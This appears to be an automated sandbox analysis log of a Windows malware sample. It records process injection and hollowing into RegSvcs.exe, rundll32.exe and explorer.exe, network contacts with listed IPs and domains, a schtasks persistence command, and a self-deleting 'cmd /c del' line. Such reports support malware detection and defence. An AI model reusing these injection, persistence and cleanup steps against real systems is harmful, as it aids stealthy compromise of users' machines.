Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04FA1B8F mov eax, dword ptr fs:[00000030h]	15_2_04FA1B8F

Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 154.203.184.76 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.primarewards.net
Source: C:\Windows\explorer.exe	Domain query: www.novergi.com
Source: C:\Windows\explorer.exe	Network Connect: 162.0.213.203 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.realsults.com

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread register set: target process: 3472			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread register set: target process: 3472			Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Section unmapped: C:\Windows\SysWOW64\rundll32.exe base address: 13D0000

Jump to behavior

Writes to foreign memory regions

Show sources

Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 680008	Jump to behavior

Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\fgEePtnFJH' /XML 'C:\Users\user\AppData\Local\Temp\tmpDFE8.tmp'	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'	Jump to behavior

Source: explorer.exe, 00000006.00000002.503872402.0000000001640000.00000002.00000001.sdmp, rundll32.exe, 0000000F.00000002.503679602.0000000003790000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000002.503872402.0000000001640000.00000002.00000001.sdmp, rundll32.exe, 0000000F.00000002.503679602.0000000003790000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000006.00000002.503872402.0000000001640000.00000002.00000001.sdmp, rundll32.exe, 0000000F.00000002.503679602.0000000003790000.00000002.00000001.sdmp	Binary or memory string: SProgram Managerl
Source: explorer.exe, 00000006.00000002.502352833.0000000001128000.00000004.00000020.sdmp	Binary or memory string: ProgmanOMEa
Source: explorer.exe, 00000006.00000002.503872402.0000000001640000.00000002.00000001.sdmp, rundll32.exe, 0000000F.00000002.503679602.0000000003790000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd,
Source: explorer.exe, 00000006.00000002.503872402.0000000001640000.00000002.00000001.sdmp, rundll32.exe, 0000000F.00000002.503679602.0000000003790000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
